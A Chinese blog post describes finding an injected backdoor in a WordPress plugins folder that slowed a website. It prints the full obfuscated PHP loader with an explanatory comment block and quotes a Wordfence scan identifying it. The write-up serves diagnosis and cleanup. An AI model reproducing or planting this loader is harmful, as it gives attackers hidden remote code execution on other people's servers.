关于一段 php 恶意脚本

女票的网站打开很慢,以前一直觉得这是从腾讯云花 1 块钱买的,慢是理所当然的。现在毕业了,享受不到每月 1 块钱的学生优惠政策,得全额付款,就觉得怎么会那么慢呢!不能接受,所以我就得帮忙看一下。

网站慢,我们能感觉得到,但是怎么入手呢?

首先从查看请求开始。

图:ttfb

在没有修复这个问题前,ttfb 的时间达到了 10 多秒,那么什么是 ttfb 呢?谷歌对此有解释:

  • Waiting (TTFB). The browser is waiting for the first byte of a response. TTFB stands for Time To First Byte. This timing includes 1 round trip of latency and the time the server took to prepare the response.

也就是浏览器从发出请求到收到响应第一个字节所等待的时间,其中包括一次网络往返的延迟和服务器准备响应的时间。ttfb 这么长,很明显是我的服务器慢,我怀疑是 php 或者 MySQL 的问题,所以我昨晚还下载了 wp super cache 来将 wordpress 站点静态化,但是依然很慢。

在这个服务器上还运行了其它站点,比如小阁,如果是 php 或者 MySQL 本身有问题,它们也应该一样慢,所以应该不是 php 或者 MySQL 的问题。于是我怀疑是哪个 wordpress 插件的问题,就这样找到了那段恶意的 php 代码。

那么我们先来看看这个脚本是啥?点击这里下载:bad

<?php
/*
 * Obfuscated loader sample. The Wordfence report quoted further down this
 * page gives the explode(chr((294-250)), '4249,60,...') table below as the
 * text that matched a known malicious file.
 *
 * What the visible statements do:
 *  - $luupgddt is one opaque string. It is never run directly; the code only
 *    cuts slices out of it.
 *  - explode(chr(484-364), substr($luupgddt, 35988-29968, 228-194)) takes 34
 *    bytes at offset 6020 and splits them on chr(120), i.e. "x". The tail of
 *    the string reads "StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtS"; element 0 of the
 *    split is then called on elements 1 and 2. Presumably this is strrev()
 *    yielding create_function and str_replace -- confirm against a byte-exact
 *    copy, since the offset cannot be checked on this page.
 *  - wmmxjcj() reads $ubhlzl as (offset, length) pairs, concatenates those
 *    slices of $luupgddt, and hands the result to its third argument together
 *    with chr(9) and chr(92) (tab and backslash).
 *  - $zolzlcjd("", ...) turns the reassembled text into a callable and
 *    $gblxcwhn("") invokes it; the final assignments overwrite the working
 *    variables.
 *
 * Fragments readable inside the blob (a $_SERVER[...] entry lower-cased into
 * $uas and tested with strstr(), @error_reporting(0), chr(ord($n)-1) mapped
 * over str_split()) suggest a second stage that inspects the request and
 * decodes a further layer by shifting each byte down by one. This is inferred
 * from the fragments only.
 *
 * Review notes:
 *  - create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so a
 *    loader of this shape depends on an older runtime.
 *  - Static indicators visible here: arithmetic inside chr(), a long
 *    comma-separated offset table, a function_exists() guard around a helper
 *    with a meaningless name, and calls made through variables that hold
 *    function names.
 *  - NOTE(review): this copy shows " x22"-style sequences where the
 *    tab-to-backslash step expects a tab before the hex digits, so whitespace
 *    was probably altered when the sample was pasted -- TODO confirm.
 */
$luupgddt = 'fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**9{d%:osvufs:~928>>  x22#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%) or (strstr($uas,"  x72 166 x3a 61  x3j}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)w6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{vo:>:iuhofm%:-5ppde:4:|:**#ppde# x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#0j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]Kd/#)rrd/#00;quui#>.%!<***f x27,*e  x>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfu  x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`.%)euhA)3of>2bd%!<5h%/#0#/*#np  x24-  x24]26  x24-  x24<%j,,*!| x24-  x24gvodujpo!  x24-  x24y7 x247fmjix6<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#w2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~  s]o]s]#)fepmqyf x27*&7-n%)utjm6<  x7g}x;0]=])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPw/  x24)%zW%h>EzH,2W%w-%o:W%c:>1<%b:>1<!gps7f_*#fubfsdXk5`{66~6<&w6<  x#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfut`cpV x7f x7f x7f x x69 157 x6e"; function rgvbtra($n){return c#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X #0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpx27!hmg%)!gj!~<ofmy%,3,j%>7f<u%V  x27{ftmfV x7f<*X&fI{*w%)kVx{**#k#)tutjyf`x  x22l:!}V;3q%}U;y]}R;2]},;osvu372]58y]472]37y]672]48y]#>s%<#462]47y]hr(ord($n)-1);} @error_reporting(0); $gerst2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFO{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!g]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!  
*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  xrfs%6<#o]1/20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,-  x24*<!  x24-  x24gps)%j>1<%j=tj{fpg)% x24-  x24*<!~!  x24/%t2w/ tdz)%bbT-%bT-%hW~%fd5egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tm)tutjyf`4  x223}!+!<+mpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#ftmbg}  x7f;!osvufs}w;* x7f!>>  x22!pdp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyP#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#f./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp% 116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c27,*d  x27,*c  x27,*b  x27)fepdof.)fepdojw)# x24#-!#]y38#-!%w:**<")));$qtxiiqd = $ceabqas("", $gersmror (strstr($uas," x66 151 x72 145 x66 157 xx24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2)ujojR  x27id%6<  x7fw6*  x7252]18y]#>q%<#762]67yWsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r  x5c2^-%hOh/#00#W~!%{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j27pd%6|6.7eu{66~67<&w6<*&7-#o]5cq%)ufttj x22)gj6<^#Y#  x5cq% x27Y%6<.msv`ftsbqA7>q%6<  x7fw6*  x111127-K)ebfsX x27u%)d%)uqpuft`msvd},;uqpu7fw6*CW&)7gj6<*doj%7-C)fepmqnf_*#ujojRk3`{666~6<&w6< x7f#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  78"))) { $ceabqas = " x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164)utjm!|!*5!  
x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-%!-#1]#-bubE{h%)tpqsut>j%!*72%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#jA x27&6<.fmjgA  x27doj%6< x7fw6*  x7f_*38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)mw>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]227}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-  x24-!%  x24-  x1]211M5]67]452]88]5]48x24<!fwbm)%tjw)bssbz)#")) or (strstr($uas,"  x6opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubEfs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudov*msv%)}.;`UQPMSVD!-is%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*jidsb`bj+upcotn+qsvmt+fmh5]53]Kc#<%tpz!>!#]D6M7]K34-bubE{h%)sutcvt)esp1")) or (strstr($uas," x61 156 x64 162 x6f 151 x6467R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#}_;#)323ldfid>}&;!osvuif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (pi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;23zbek!~!<b% x7f!<X>b%Z<#opo)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%bopjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3J`GB)fubfsdXA x27K6<  x7fw6*3qj%7>  x2272qj%)7gj6<**2qj%)hopm3qjA)qj3ho364]6]283]427]36]373P6]36]73]83]238M7]38ufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zspph#)zbssb!-#}#)fepmqnj!/!pmA  x273qj%6<*Y%)fnbozcYfvr#  x5cq%7**^#zsfvr#  x0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#6y)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]x24)##-!#~<#/% x24-  x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-!!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOB68]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]%)!gj}Z;h!opjudovg}{;#)tutjyf`mrh = implode(array_map("rgvbtra",str_split("%tj81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52:ftmbg39*56A:>:8:|:7#6#)tutjyf`439d%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x27pd%6<C x6:!}7;!}6;##}C;!>>!}W;uth); $qtxiiqd();}}24-tusqpt)%z-#:#* x24-  x24!>!  
x24/%tjw/ x24)% x24-  x24y4 x24-  x24]y8fs} x7f;!opjudovg}k~~x246767~6<Cw6<pd%w6Z6<.5`hA  x27pd%6<pd%w6Z6<.4`hA x27p24*!|!  x24-  x24 x5c%j^  x24-  x24tvctus)% x24-  x24b!>!%yy)#}#-#  x24-  x>2<!gps)%j>1<%j=6[%w!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfw3 150 x72 157 x6d 145")) ALS["  x61 156 x75 156 x61"]=1; $uas=strtolow{e%+*!*+fepdfe{h+{d%)+er($_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}5!gj!<*2bd%-#1GO  x22#)fepmqyfA>2b%!<*qp%-*>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)jStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSwexqjzu'; $wyhddjtlfc=explode(chr((484-364)),substr($luupgddt,(35988-29968),(228-194))); $zolzlcjd = $wyhddjtlfc[0]($wyhddjtlfc[(5-4)]); $eyqpxsnf = $wyhddjtlfc[0]($wyhddjtlfc[(6-4)]); if (!function_exists('wmmxjcj')) { function wmmxjcj($ciswolno, $ettwwvevkhx,$jwyjeoenm) { $ajeokaw = NULL; for($ldsnfh=0;$ldsnfh<(sizeof($ciswolno)/2);$ldsnfh++) { $ajeokaw .= substr($ettwwvevkhx, $ciswolno[($ldsnfh*2)],$ciswolno[($ldsnfh*2)+(3-2)]); } return $jwyjeoenm(chr((30-21)),chr((393-301)),$ajeokaw); }; } $ubhlzl = 
explode(chr((294-250)),'4249,60,5021,51,5712,44,5778,65,2423,49,191,37,4122,50,3825,24,5687,25,2672,43,3369,69,1219,44,1480,42,5165,48,3303,66,5480,54,5299,51,3043,30,876,35,0,39,3136,21,725,51,1976,46,1938,38,1739,34,4567,69,4768,24,4676,66,4792,23,3073,63,1104,27,3178,29,3570,38,1131,68,3985,67,2758,25,3207,27,287,41,5350,24,4309,51,3965,20,3157,21,1636,34,2268,36,5135,30,3849,60,2981,62,3482,29,1889,49,1337,26,427,43,3438,44,4102,20,5952,68,1773,50,228,59,5911,41,633,30,528,35,2574,37,2381,42,5622,65,4052,25,4742,26,1301,36,2234,34,996,66,4505,62,4360,28,3234,69,2304,37,598,35,3511,59,4227,22,5459,21,39,22,5265,34,1589,47,328,32,2214,20,5756,22,4443,62,1199,20,1363,24,2022,51,4172,55,563,35,1387,55,3909,56,911,55,1263,38,2715,43,3665,57,5072,63,3608,57,776,45,1442,38,2783,21,5843,68,3722,59,5534,68,5391,68,663,62,2073,62,4953,68,360,67,4815,68,2155,59,1062,21,2923,58,1522,67,5213,52,2472,70,470,58,4077,25,61,64,1670,69,125,66,2135,20,4883,70,4636,40,3781,22,1823,66,2804,63,1083,21,4388,55,2542,32,966,30,5602,20,821,55,3803,22,2341,40,2867,56,2611,61,5374,17'); $gblxcwhn = $zolzlcjd("",wmmxjcj($ubhlzl,$luupgddt,$eyqpxsnf)); $zolzlcjd=$luupgddt; $gblxcwhn(""); $gblxcwhn=(430-309); $luupgddt=$gblxcwhn-1; ?><?php
图:恶意代码

下载 wordfence 来扫描一下

然后根据扫描结果,修复其余类似的问题。删除被植入的文件只是第一步,还需要查清文件是怎么被写进来的(例如存在漏洞的插件或泄露的密码),否则很可能再次被植入。

  • Filename: wp-content/plugins/index.php
  • File Type: Not a core, theme, or plugin file from wordpress.org.
  • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: explode(chr((294-250)),'4249,60,5021,51,5712,44,5778,65,2423,49,191,37,4122,50,3825,24,5687,25,2672,43,3369,69,1219,44,1480,42,5165,48,3303,66,. The infection type is: A backdoor known as eawtliul.

为什么会导致慢?

这个话题我们下次再说。

参考链接

https://developers.google.com/web/tools/chrome-devtools/network-performance/reference#timing-explanation

作者: 曾小乱

喜欢写点有意思的东西
